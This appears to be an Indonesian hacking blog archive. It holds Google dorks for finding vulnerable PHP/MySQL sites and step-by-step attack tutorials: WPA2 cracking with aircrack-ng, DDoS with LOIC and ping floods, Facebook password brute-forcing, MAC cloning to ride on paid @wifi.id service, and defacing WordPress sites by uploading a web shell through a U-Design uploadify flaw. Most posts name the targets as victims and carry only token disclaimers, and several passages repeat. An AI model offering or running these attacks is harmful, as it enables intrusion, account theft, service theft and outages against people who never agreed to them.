inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
Rabu, 26 April 2017
Kamis, 09 Februari 2017
Cara hack password wifi menggunakan linux kali di virtual box
WPA2 adalah protokol keamanan terbaru yang dikembangkan oleh Wi-Fi Alliance untuk mengamankan wireless (802.11) jaringan. Tidak seperti pendahulunya WEP, itu dianggap kuat dan aman. Apa yang banyak orang tidak menyadari, adalah bahwa hal itu hanya mengamankan jika password yang kuat dipilih. Artikel ini akan menunjukkan langkah-demi-langkah bagaimana untuk crack password WPA2 lemah.
Disclaimer: Kami tidak harus memberitahu Anda bahwa hacking jaringan yang Anda tidak sendiri mungkin ilegal.Artikel ini dimaksudkan untuk digunakan untuk tujuan hukum saja, seperti pengujian penetrasi resmi.
Untuk hack ini kita akan menggunakan Kali Linux, yang merupakan open source pengujian pena distro canggih dengan berbagai alat.
Kali Linux dapat diatur dalam beberapa cara,
tapi untuk lab ini sudah diatur sebagai mesin virtual menggunakan Oracle
VirtualBox v4.3.26, pada Windows 7 workstation. VirtualBox dapat didownload secara gratis dari situsvirtualbox.org. Setelah
VirtualBox telah diinstal pada Windows 7 workstation, Kali Linux
diinstal ke VirtualBox dengan file Kali Linux ISO
(kali-linux-1.1.0a-i386.iso), yang dapat didownload secara gratis dari
kali.org.
Untuk lab ini kita menggunakan eksternal USB antena Wi-Fi, khususnya AWUS036H Alfa Model. Ini
bisa sangat sulit untuk menggunakan built in antena Wi-Fi dengan Kali
Linux karena masalah driver, tapi antena Alfa ini umumnya digunakan dan
didukung oleh Kali.
Berikut adalah screenshot dari VirtualBox seperti yang telah dikonfigurasi untuk lab ini:
Konfigurasi antena Alfa di VirtualBox bisa rumit, jadi di sini beberapa screenshot dengan pengaturan yang disarankan:
Catatan pada tab Jaringan di atas: kita harus kami telah memilih dibangun di adaptor nirkabel, dalam mode bridge. Juga perhatikan kami telah memungkinkan modus promiscuous.
Catatan pada tab USB di atas: kita telah memilih Realtek, yang merupakan eksternal Alfa antena USB kami.
Setelah di atas telah diinstal, kita membuka jendela terminal di Kali Linux. Pertama kita memverifikasi interface. Masukkan "iwconfig" dan memverifikasi Anda memiliki wlan0 dan mon0 interface seperti pada screenshot:
Masukkan "airmon-ng" dan memverifikasi hasil Anda mirip dengan screenshot di bawah ini:
Sekarang kita mulai fungsi pemantauan nirkabel dengan "airmon-ng start wlan0":
Catatan itu mengatakan mode monitor diaktifkan di atas, jadi kita tahu interface monitoring siap untuk pergi.
Berikutnya kita menggunakan "airodump-ng mon0" untuk menemukan jaringan kami ingin retak:
Biarkan berjalan beberapa menit, kemudian mengontrol C untuk berhenti. Jaringan kami ingin retak di atas, SSID adalah NETGEAR94 (TIDAK Netgear 84). Kami sekarang memiliki SSID, BSSID dan Channel yang kita butuhkan.
Berikutnya kita menggunakan "Airodump-ng -w somefile -c 11 -bssid 80: 37: 73: A7: AA: 08 mon0" untuk mengumpulkan data yang diperlukan untuk retak.
"Somefile w" adalah file yang data akan dibuang, Anda dapat menggunakan nama file yang Anda suka.
"-c 11" berarti Saluran 11, saluran yang SSID menggunakan:
Di atas itu berjalan, kita biarkan berjalan beberapa menit sementara karena mengumpulkan data.
Untuk berfungsi dengan baik, Airodump-ng di atas harus menangkap data password. Pada sibuk jaringan Wi-Fi ini tidak ada masalah, sebagai data password dikirim melalui udara secara teratur. Jika jaringan Wi-Fi tidak sibuk, kita dapat (opsional) memaksa data password yang akan dikirim menggunakan de-auth. Hal ini dilakukan dalam jendela terminal baru, sementara Airodump-ng masih berjalan, seperti pada gambar di bawah:
Biarkan berjalan beberapa menit, kemudian Control C untuk berhenti.
Tutup di atas Window, kemudian kembali ke jendela asli. Sekarang menghentikan Airodump-ng dengan Control C. Jenis Berikutnya "ls", untuk memverifikasi kita memiliki file yang kita butuhkan:
Berikutnya kita menggunakan "Aircrack-ng somefile-01.cap -w usr / share / daftar kata / rockyou.txt".
Di mana "somefile-01.cap" adalah file capture.
Di mana "-w usr / share / daftar kata / rockyou.txt" adalah jalan ke kamus file password rockyou.txt.
rockyou.txt disertakan dengan distro Linux Kali, tetapi datang zip sehingga Anda akan perlu unzip, dengan gunzip. Password file kamus lain yang tersedia secara online, dan dapat digunakan di tempat rockyou.txt. Di layar, itu membandingkan dump di somefile ke kamus di rockyou.txt, yang dapat memakan waktu cukup lama:
Setelah beberapa saat, kuncinya ditemukan. Kami dapat login ke jaringan menggunakan luwak password. Sukses, kami telah menyelesaikan hack !!!:
Jika Anda mengambil apa-apa lagi dari artikel ini, ingat ini. Pilih sandi yang kuat untuk mengamankan jaringan Wi-Fi Anda dengan WPA2, atau Anda berisiko password hacked..
Rabu, 25 Januari 2017
Cara DDOS Website Agar Cepat Down with LOIC
serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon. program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
Download Software nya DISINI
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4.
silakan lihat hasilnya dibawah, disana terdapat keterangan berapa
jumlah packet yang connecting, requesting, downloading, downloaded,
requested dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
cara
kedua adalah dengan membanjiri Ping melalui command promt alias CMD.
buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows +
R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul
ketikan
#ping target.com
setelah
itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip
adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem
server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua
cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh
lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah
hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
CARA CRACK PASSWORD AKUN FACEBOOK MENGGUNAKAN KALI LINUX
ASSALLAMUALLAIKUM WR WB
Selamat sore para blogger mungkin kalian bertanya - tanya bagaimana sih caranya hack facebook
kali ini saya akan membahas bagaimana cara hack facebook menggunakan facebook.py
cara kerja dari facebook.py ini masih menggunakan tahap cracking jadi harus menggunakan kumpulan kata kunci yang berada di dalam wordlist
py dalam artian python dan menjalankannya harus menggunakan bahasa pemrograman python
kalau di kali linux atau Os pentest sudah tersedia
oke langsung saja
1. Download terlebih dahulu script facebook.py nya disini
Jika belum memiliki wordlist bisa sedot disini dan taruh kedua file di file home
Buka Terminal anda dan jalankan dengan perintah
python facebook.py
2. Masukan username atau Id korban
buka target anda
dan ubah dari www menjadi graph
copy username atau id korban
contoh :
Masukan Wordlist anda
Contoh :
karena lokasi wordlist saya berada di file home jadi menggunakan perintah
/root/wordlist
Tunggu untuk mendapatkan password korban
jika sudah menapatkan password nanti tampilannya akan seperti ini
Dan Login
email gunakan username atau Id korban
dan password gunakan yang sudah anda dapatkan
Selamat Anda bisa Hack Facebook :)
Gunakan dengan Bijak
Kami tidak akan bertanggung jawab atas apa yang anda perbuat
Mohon maaf untuk pemilik akun ini :v
Selamat sore para blogger mungkin kalian bertanya - tanya bagaimana sih caranya hack facebook
kali ini saya akan membahas bagaimana cara hack facebook menggunakan facebook.py
cara kerja dari facebook.py ini masih menggunakan tahap cracking jadi harus menggunakan kumpulan kata kunci yang berada di dalam wordlist
py dalam artian python dan menjalankannya harus menggunakan bahasa pemrograman python
kalau di kali linux atau Os pentest sudah tersedia
oke langsung saja
1. Download terlebih dahulu script facebook.py nya disini
Jika belum memiliki wordlist bisa sedot disini dan taruh kedua file di file home
Buka Terminal anda dan jalankan dengan perintah
python facebook.py
2. Masukan username atau Id korban
buka target anda
dan ubah dari www menjadi graph
copy username atau id korban
contoh :
Dan masukan username atau Id korban di tools facebook.py yang anda jalankan tadi
Contoh :
karena lokasi wordlist saya berada di file home jadi menggunakan perintah
/root/wordlist
Tunggu untuk mendapatkan password korban
jika sudah menapatkan password nanti tampilannya akan seperti ini
Dan Login
email gunakan username atau Id korban
dan password gunakan yang sudah anda dapatkan
Selamat Anda bisa Hack Facebook :)
Gunakan dengan Bijak
Kami tidak akan bertanggung jawab atas apa yang anda perbuat
Mohon maaf untuk pemilik akun ini :v
Mohon maaf ada kesalahan kata :)
CARA HACK @WIFI.ID MENGGUNAKAN KALI LINUX
Selamat malam para blogger
semoga di hari ini kalian semua sehat walafiat
Kali ini saya akan memperlihatkan bagaimana cara hack @wifi.id dengan cara mengkloning macc address kita dengan macc address korban menggunakan terminal di kali linux
kalo bisa gratisan ngapain bayar :D
hehehe
jika melakukan hal ini dosa di tanggung sendiri
oke langsung saja
1.buka terminal anda dan ketika perintah berikut :
airmon-ng >> yaitu fungsinya untuk melihat interface yang anda gunakan
dan di kasus saya , interface yang saya gunakan adalah wlan0
2. dan ketikan perintah airmon-ng start wlan0 untuk menyalakan interface mon0
3. ketikan airodump-ng mon0 untuk melihat interface dan maccadress korban yang sedang terkoneksi dengan wifi id
berikut tampilan korban yang sedang terhubung dengan wifi id :D
dan copy macc address korban dan pastekan di macchanger
NOTE : CARI FRAME TERTINGGI KORBAN DI WIFI ID
4. seteleah itu tekan CTRL + C secara bersamaan, disini kita akan mengkloning macc address kita dengan korban
dengan perintah sebagai berikut :
ketikan perintah >> airmon-ng stop mon0 untuk mematika interface mon0 kita
ketikan perintah >> ifconfig wlan0 down
ketikan perintah >> macchanger -m maccadresskorban wlan0
ketikan perintah >> ifconfig wlan0 up
5. setelah itu sambungkan internet ke wifi id
selamat anda bisa internetan bersuka ria dengan kecepatan tinggi :D
semoga di hari ini kalian semua sehat walafiat
Kali ini saya akan memperlihatkan bagaimana cara hack @wifi.id dengan cara mengkloning macc address kita dengan macc address korban menggunakan terminal di kali linux
kalo bisa gratisan ngapain bayar :D
hehehe
jika melakukan hal ini dosa di tanggung sendiri
oke langsung saja
1.buka terminal anda dan ketika perintah berikut :
airmon-ng >> yaitu fungsinya untuk melihat interface yang anda gunakan
dan di kasus saya , interface yang saya gunakan adalah wlan0
2. dan ketikan perintah airmon-ng start wlan0 untuk menyalakan interface mon0
3. ketikan airodump-ng mon0 untuk melihat interface dan maccadress korban yang sedang terkoneksi dengan wifi id
berikut tampilan korban yang sedang terhubung dengan wifi id :D
dan copy macc address korban dan pastekan di macchanger
NOTE : CARI FRAME TERTINGGI KORBAN DI WIFI ID
4. seteleah itu tekan CTRL + C secara bersamaan, disini kita akan mengkloning macc address kita dengan korban
dengan perintah sebagai berikut :
ketikan perintah >> airmon-ng stop mon0 untuk mematika interface mon0 kita
ketikan perintah >> ifconfig wlan0 down
ketikan perintah >> macchanger -m maccadresskorban wlan0
ketikan perintah >> ifconfig wlan0 up
5. setelah itu sambungkan internet ke wifi id
selamat anda bisa internetan bersuka ria dengan kecepatan tinggi :D
MOHON MAAF JIKA ADA KESALAHAN KATA
Mencari Celah Website dengan Uniscan di Kali Linux
saya sekarang akan membahas Uniscan ;) tool scanner yang sudah tersedia di Kali Linux.
sebenernya di Kali Linux dan Backtrack juga ada tool scanner bernama W3af dan Vega ^_^, selebihnya cek di google :p , xixihi para pinguin pengendali naga yuk merapat ;)Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perl.dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita gak perlu install lagi :p
jadi dari penjelasaan di atas gak semua website yang bisa di scan ya ;)
untuk menscan buka terminal Linux anda
dan ketikan:
uniscan -u http://www.target.com -qweds
*www.target.com ganti dengan web yang ingin anda scan ;3
- lalu enter
fungsi options di atas adalah di gunakan untuk mencari
q -> directory
w -> file
e -> file robot.txt
d -> dynamic artinya mencari celah / bugs yg mungkin ada di site tersebut
s -> static
nanti saat di scan akan muncul terdapat informasi tentang domain apache, IP, directory dan file yang terdapat dalam situs tersebut, dan lain lain, banyak deh ^^
tunggu hingga scan selesai, jika selesai cari tulisan metode yang ada tulisan vuln nya
jika misalnya vuln nya menggunakan sql , yaudah langsung eksekusi aja ;)
Senin, 23 Januari 2017
Deface Dengan POC U-Design
Dork:inurl:/wp-content/themes/u-design/sliders/intext"kids"
Kembangin Sendiri "Gunakan Pikiran Kamu"
Exploit:/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Vuln= Blank / KOSONG
Csrf online : http://dukujuk.idwebs.info/autocsrf.php
STEP:
1.Dorkin.
Contoh:gct.com
2.Tambahkan Exploit Di Belakangnya.
Contoh :gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3.Jika Vuln Maka Akan Jadi Blank/Kosong
4.Setelah itu Kalian Masukan Ke Auto CSRF
Di Atas
5.Setelah Itu Masukan Site Yang Vuln Tadi Contoh:gct.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
Dan Bagian Bawah FileData
6.Jika Berhasil Kalian Akan Di Suruh
Mengupload Shell
7.Jika Berhasil Maka Akan Muncul Angka "1"
Selain Angka Satu Tidak Bisa
8. Setelah Muncul Angka "1" Kamu Hapus Exploit Yang Tadi Lalu Ganti Shell Kamu
Contoh : gct.com/yourshell.phtml
9.Tebas Index
10. Shoow off Deh
Thanks To :Mr. Face Gagak Cyber Team
Langganan:
Postingan (Atom)